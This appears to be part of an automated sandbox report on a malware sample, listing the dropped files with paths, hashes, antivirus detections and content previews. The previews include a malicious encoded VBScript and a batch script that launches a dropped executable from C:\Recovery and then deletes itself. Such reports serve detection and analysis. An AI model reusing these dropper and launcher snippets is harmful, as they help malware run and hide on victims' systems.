            Preview:KSUdgZKlB0yCzID1SjgovC2uRhLyCoqyv7k2Faxb9sdsdCUD7Vc4PpiHakM9NVjXKAQ1iKv2wFpDiJRONI1qLwiGZccfNxNnIGicvcfwjkHKAfiRS7wFe3LYbKcFsPo81B4ckydvnFGloXG34LMQBIJP4JBl9ZET5IS8kGqeeBcYwkuDDjLhDY6t2phbx2vNBwpfFHSxeswAqucUZ7haOgQhMjG5iOrmPOX94O85QXCVm6CHMNBzUV8egITfBWPQAJvbWdaK9mJ1e54Ph8tVM2R4P3cv5d33IwUcLkvsw1zsLH9kND8Dn3DI20MdAoPgsPtslcE6NAiV
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with very long lines (722), with no line terminators
            Category:dropped
            Size (bytes):722
            Entropy (8bit):5.871063185154126
            Encrypted:false
            SSDEEP:12:0TxskmsmBSxNGkAAM2lub6HeQALsOV+jQ/19FiWj7IjylcHw18AJ6c6qTVX1Bj9s:aFmsmBSbG/WHnALLzFiWge6QDr6otR2H
            MD5:BA3F089F2548C4953C7A0C23CC1D32A1
            SHA1:91379721BC1332B613944B9922A1C857B5B593BC
            SHA-256:2DB5B2F241F8BD41A9ED24A6DAFAC8FA310C314C50B6B8164F985EB7C3AFFECD
            SHA-512:FE132339DA60ABFD8A6A2282FD327D2E741AC19B48FB3D64375BE5D2CD0A27138FB047F615272280B1C10ED13E9EC0589415C2C23A2E61F2FF06DCCEFCE12F98
            Malicious:false
            Preview:TDETN0nTBK4p9z5ycVIOxoMoQDW6Zwu1eQQ2oCdmAcTRndVd4a9MhP5o0ZCKdq4PaDKsiDJa2gOVV5Bwr3C8whUOVmBO9TIThD0jSn41RjUBAjT4YPcko6c2s6W6C4aiX5xREbdE8KqNNSNwSG0t0ioll81WQ7zXIvnFvB06vXldPOoaskn5DqryQMqGkHyBVTFcoIARQ38c7KWWUbopU3TbDzyjUtWojjH5JMvjkVoJsO0G0UwJcIqc9nYzTb7ggT3XCaMHqEE8PJty8ssA7NMa3p6gx5QJYHnYVcDaIodXEsMz3k1ks6iTHceXepUuy5jHgVcfpS1TuyWKcGnMEpbciTQ28q6cTsjJJFTiHV5ZEOjSGT4YCIqIdHiNEjh8WZABPNBXwEEtuBXTu8wowhZLCapBhGdhx6DpOhD2Shl7D7XcuOcGx3My9z9yi90qkh5x7rFN43VP6cHECMRSnXu3uPpYhOUSq5WgBkeCIPL3h72hr4vVshCNwCDsBrqpjDiBFlDcsPJYL1VwXIqmd9kJ2Ju9gwAbifTeZ0bG1SndXoB4qRV3ADMjdYJ51E65Oszpi0XgqkvKWGvOHzSPaHbfTuBArgOwWrOpyVWz4yMaSCNWn4yBvreHRUWxzWyKV8xp1FZwddUl4BNQhpXwrMBpMHYe8iAhACETOhehfBiSW2MQHGQJ9BcJ7Icur5x4dxl163C9LzRposST5I
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):106
            Entropy (8bit):5.442279596310034
            Encrypted:false
            SSDEEP:3:R7wgdSVj1cyfewv0kvN5NGACLyMo:Rcgdo1Ffew8kVPGAl
            MD5:CC85F6337BF85FFB3FA3AA1481ABFEEB
            SHA1:7C523B14CA12C8B6D1A35191D79CEDCACF0204C2
            SHA-256:DA7DADBB79C5C833CD242EE6B59EBAB474EA61FA4C7470432C877FC56A2E3CEB
            SHA-512:E7A7940A545F9BF2DD97B1533CB2BA7E7B3BE2400A3315440149B06C34B41C633B532BA1B7D3CCE9CD0B284360CE00782799FFA59B45E3C8ED2BA33242BCC76E
            Malicious:false
            Preview:pQGmbeLfOyN4zUGGJW2kQZAETkB4swk3Vj7oxZVukrPlPwXVOreAznzPQBT0cQxcOUjPXbTtAHAiKYyhNqqASkDsurYvGeST4xX5NH7wYu
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with very long lines (657), with no line terminators
            Category:dropped
            Size (bytes):657
            Entropy (8bit):5.862801429849006
            Encrypted:false
            SSDEEP:12:8QvrEdUE9J0Xe8jAqRq+tBO60LWjADCCbR9VdIqG5BR7Rmx0ZhUIl0sfpU:8QvYdV0OKI8octCd9VxG3vLZh5T+
            MD5:B0B9F6DF6AA0BA8BF661A7C54FD92A19
            SHA1:16D05F3A8F2082DE4F54F918538A57080C88D362
            SHA-256:267D5626E3BAC15E017A83B93D983B81D9A83B46929928CD7FEC64DFE012645C
            SHA-512:A30D77BFB3630EB4432099BA0A706C1E7D9C43583FAA57D384125086033BBB4703AC3A76C46B6C6BACBB223EEB3AADFB8A58A261B0E34EF354D22AF8B5B6100C
            Malicious:false
            Preview:20cP6kkqAbbiF0NSgn4BplFlR7jIa5ayGtZa6ViNbZVzHEvN2V9VTO9Qv078AbQEAnbVaxVKFqjQPQeNLWQF6Ee2uIpGXjNAJRyemZwF9yQnosBeWtwnLKI6IjlSIPxfdjH8c9lwkLFHy0OBHKunwjz8J2VCye6tBuJElCCWIAD9FAHSVjK7fJt4uJyjni7FOWFDrJZEHXfvfz3IuDrOT9N2BPUcNcskD7vs5EkMJFzIo7Y5Pqzk0swOIMCcz60oo5shDKMqcfFNJFOD0ZMhnItULhksBIXMOKdtP11FdIHVniFC88lZuTAgLXVgjeoUI298lfy8hHDfAXrnbhuDg7c5J7h1fVf9dxNvjGacJn2mPffyqsEBtlxLZDyn87cLlECNK5EVGR33E0poctLxRdP29BWfRxeMKrALdRnuos4cr3HiXKLOwp3HzJNIjiDTwrtWzeLLFaIjjwKG4xHHlQaey3WTDeLGpkqAKut389IVgUiC8HOva5rgQPh6I1HlPC48GK6JEOJlHE7eUTU6QZpt3Jt5MxuG2hGdak5yLErMwFZLRDlygLUzXLF7bB6RdCtj8eEuXgvMsd6xuhnJL5krNRGPf8XKHasuWzNx91aAZIH4OSN3XxFhcBWqXzPZJlFRvLa4T0JUfjRFJ
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.370111951859942
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
            MD5:12C61586CD59AA6F2A21DF30501F71BD
            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1830
            Entropy (8bit):5.3661116947161815
            Encrypted:false
            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
            MD5:FE86BB9E3E84E6086797C4D5A9C909F2
            SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
            SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
            SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
            Process:C:\Users\Public\Desktop\spoolsv.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.370111951859942
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
            MD5:12C61586CD59AA6F2A21DF30501F71BD
            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
            Process:C:\Users\user\Desktop\5U9CuGu1ru.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\5U9CuGu1ru.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):34
            Entropy (8bit):4.124083797069061
            Encrypted:false
            SSDEEP:3:LlzRWDNMSdn:PWbn
            MD5:677CC4360477C72CB0CE00406A949C61
            SHA1:B679E8C3427F6C5FC47C8AC46CD0E56C9424DE05
            SHA-256:F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B
            SHA-512:7CFE2CC92F9E659F0A15A295624D611B3363BD01EB5BCF9BC7681EA9B70B0564D192D570D294657C8DC2C93497FA3B4526C975A9BF35D69617C31D9936573C6A
            Malicious:false
            Preview:MsgBox "TestDefault, Message!", 64
            Process:C:\Users\user\Desktop\5U9CuGu1ru.exe
            File Type:data
            Category:dropped
            Size (bytes):214
            Entropy (8bit):5.846578170013664
            Encrypted:false
            SSDEEP:6:G3wqK+NkLzWbHhE18nZNDd3RL1wQJRQrRr1E3dY4Wf1:G+MCzWLy14d3XBJ2r1CYR
            MD5:24D6887613762DB9ACD22313EF674B81
            SHA1:D50168D7E5EA884E0761431B42FBFEAB6BA0791E
            SHA-256:4D61671EC0E16D5FDE2A7B0C2C0C3ECEE2597E90B782A7CC248DD657A0B8920F
            SHA-512:62C419FE9BCC6807CA038D2EC2AD7C6D76FDB9851BB2C9B36B73CA429292C6E97441ECFBB81E6A88FC893E721E9922095BE8048A875F9D18295B3372B71B46C3
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:#@~^vQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v%T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JuP.:2uz&xYKN4^wJyj+.lTU$s%G{o:2bx)a?RV~}AR8CDJSPZSP6lsd.iTsAAA==^#~@.
            Process:C:\Users\user\Desktop\5U9CuGu1ru.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):34
            Entropy (8bit):4.182907326480826
            Encrypted:false
            SSDEEP:3:5IvL7TJv0XBL4i:5ITft04i
            MD5:8A76133B1B6BFD366BBD35FB1D2D8B95
            SHA1:A3732BF75C0528DA46D1FDDEA1D549743CE9C6F4
            SHA-256:9CD8FA02B6CC3C89A404060C058EFB97BCB8F606EF895ABBA9E04FAAE7880F7A
            SHA-512:50D86F78C8EE9E45A19E1204FF102AD5660AD7FF786C34792FC0D21560186C27F67D83E867A4F23ABDC80303FF8986BD6C8BC9A4964FE15A26FDAB742346CFE7
            Malicious:false
            Preview:"%Temp%\Intodhcp\containerdll.exe"
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):25
            Entropy (8bit):4.323856189774723
            Encrypted:false
            SSDEEP:3:cmt0kyGF/Ryn:XGkL8n
            MD5:8C2E49A358624FED5FDA52917DC182BA
            SHA1:853EEF6342A58AC3C0A5B7BD4B64803C44164D46
            SHA-256:204D0B1309A776C80E18C3F7AF62ECA6B7A5657616408EC5FEFC9440BD8960B2
            SHA-512:41318E20ED88E697F1C9CE34F5B35DEE0E00607179FBC8444AE6FF644EDFD9610F4062D96500BB01947B4561159AE4A812D8D298B7B87304926EAA870EAD0982
            Malicious:false
            Preview:3aeCTNQAFmn5oKTzvRvVt6RVW
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:DOS batch file, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):212
            Entropy (8bit):5.294267426448979
            Encrypted:false
            SSDEEP:6:hITg3Nou11r+DE7KVzupxdiKOZG1923f/Thn:OTg9YDE7ozupcXThn
            MD5:1926F1233CA448D4554CDE9AA8D72737
            SHA1:D4760C0BE375A0DE0E78E046DAB16CE97672F56B
            SHA-256:985B247982AD04CC01ECFEAACD0FC3FBA56B97F1FD9A06438BB38D51D780DED3
            SHA-512:F0285CF116D6772F8E3EFCD53811D822F17A9893852355BAF1560B35D272FE5A8F65CDED186A43EB721B14F53615A809EE9C523A57624681C897C4707EA0EB24
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\kVQjSoqMfO.bat"
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with very long lines (825), with no line terminators
            Category:dropped
            Size (bytes):825
            Entropy (8bit):5.886087096289368
            Encrypted:false
            SSDEEP:12:k188bigEZWmd9fTioHcCDNppoGFPYCixWo4a2hdk62CyyptMWlBKmytgK:Q5paddYC/OFZWSWk6rMqKT1
            MD5:A5068A9EA8176A488FAF386F4693F9FE
            SHA1:3B6D82D5E7EB81756DC6990C5DEAA91D03ED3C90
            SHA-256:A1D42E82B36AD974B1740B9BFB5EA3484691AB073208B365D23EBB2EA90B8219
            SHA-512:74F31CFDE382669EE52A524EFA943DE3DF7AE6ECB16EEB426CA0498D0CC65BA8F621766212B98B615E4D4D0B3EBC2727734B97616173C3EFF58B724DB7AC5B55
            Malicious:false
            Preview:jRUTOER8JuweO0Jzji5nmOmRBg64b9rbA3tCkzJy92YOxaHP55RBTAMUoDRrHXhKCVeUGGOuZGnu0YelYq8fsqIArZYhhbqmUOLc6xIzqhmMWcePiqSaZBcWMdnrsrM7aBZlMColhJzLD6nP4I80JQNTvzPcKbG8UowVC2DfBq2QLRSQzXwktVyKyF0XwMbGC10ZJSMCFczcX6Ieg8mwogP80mh6CqszPwNUa3GhLueQgVw17V0yjpbfm1ihuQ9ZuANlsxDn2Fl3B8bfzq8rz4PkUsriVix4vFggILIJRN5eDienZDsERSjzumRAGfRTSqI5c5WohzZm9ugvODIR0sncgrvf4IDw5mMXZiLeqEgb3609FfwCW9cjCpZvJ0tZvnrXiJWp2olwLLjj1vZZVAZ5JnUuJaU0UHqPPdb6JGKsYqX1Gz3XaUDuNvN5ylgbTucEfTUYUdQO0rgcPdnTg6Z9D5CdPgIhjsYnOTVwefD7Ey3fPvqU8N5XVcAjR0IyVspIT2O5I1yA3c4PBgOd0xjWxBSvSvfnXPmVJvMWguMGY4e3hviumo8hJSVRkcmWWKnnziFPT26Fkc82hZNhNuBsREM1a5wEH0uNR0D9qSbur27rTcuKOFJmJ5WuWNzYG28tsvlrVO14TRAYHeh7KlzCrHDVdSmccCnz4N8i1DyANOT157n2p1NeC6CkrPNDmZbQnKe3g9FHwzycyLagpuwkzIw8KX0l0vXywCOuctVqwFsNHjwfzqY2m0beXgsIIdRAb9qv7pD5YFytaj0llVwJXfM5ltX5ANhSysvI3AhKncegBrEyqHgxr
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with very long lines (561), with no line terminators
            Category:dropped
            Size (bytes):561
            Entropy (8bit):5.880534797294184
            Encrypted:false
            SSDEEP:12:jeYl/WRQ6Csv8UzE0qzs1e3huCHkZ8kBES+uJ/1YVvN:jDCRv8UIfUDBEYSN
            MD5:C829C2438EA1442BB094BDB8E5E97CE2
            SHA1:658C8334FB753FD76AC7373EC8A5E9738668C496
            SHA-256:1C5C59A284759D9F43C51A416ABAEBDB73C10D5A869F95B2411B5A2FAE4AA689
            SHA-512:26E942B3E1580A61549D37A97A1D7E30E341E266D9A722F258C9FC2325E975C5437A9BA486474B5A65946A0E77F9417BB1B8944C87626BDB72D586A60A321FC2
            Malicious:false
            Preview:2zXpQSn4LRQz6ZSGqhNJDw9iplsONAw7JFoI0BRoMF3EYQ7m8vR3VPfGzz9pjYrKfSq1vJQoPi6725JZoGQbt2m3khTACmEyXsiFkF1yfnnwThN3qjAcIQbmqxRN0PmmdHkKXEziPb5FP0jCTZUcmmqHQ6Ywyn7PBASL7DglucMqUVX0NO3b5JA1bd4apCtmepEOhXFQ2trJZAw4iiiktgU1AaueIG5sskMpRJSzJmjMb1caq91HdJ27VNOGnlHwx9ayyHnZPtbH6HZJ8TxJOxOjrOTD5MMhexYbanmjWb1urvAOxEITy8h9v0GjxjeDh3mJs8sVqNww6d16NFQ0E2tgPZqjgCww6yNyJ1fzWwnkLuDR8KWsTo9oKF4TRIynbAzHQDxWjbdRPIUeVYkWqDdRzioD6MhN79JL55B5W9I1LrZBvZ73ic7XghSrZtZX4QTQ9IjZXp9q5mGHJnRgOnpfCvpXnUgmku75YJBm0hg2dQb4bLhwc3JQkyONdMwDIWGLoLtAlpqqHwBvUu5cwuKqkrUk5xJnvdtHKPPPbhKxMdIyw
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with very long lines (490), with no line terminators
            Category:dropped
            Size (bytes):490
            Entropy (8bit):5.861963529142372
            Encrypted:false
            SSDEEP:12:GvVE2mqzGXJ1TWiziPOEpZn5EW/TGB96UH3T93nj3l4x+:GvEq2P9itpZ5P/qBFRz14k
            MD5:4E686F074F37A2DC9DCB6B18D27D43C9
            SHA1:BCD72101E1A1D3404251D36DEA99B1A05A397783
            SHA-256:D969B3A22F9A3F0CBEE35939C44B89A5E68CB3CCB24B99C121E3FB2D91AF9170
            SHA-512:3705F63CFCCBFD5D4462D4C59B69D40E94976A6E2336131230864365CC0CD449ACC2503A4B51CC29723DDF7077E1A05390B3709F6CF0B858398B80B2AC8CA254
            Malicious:false
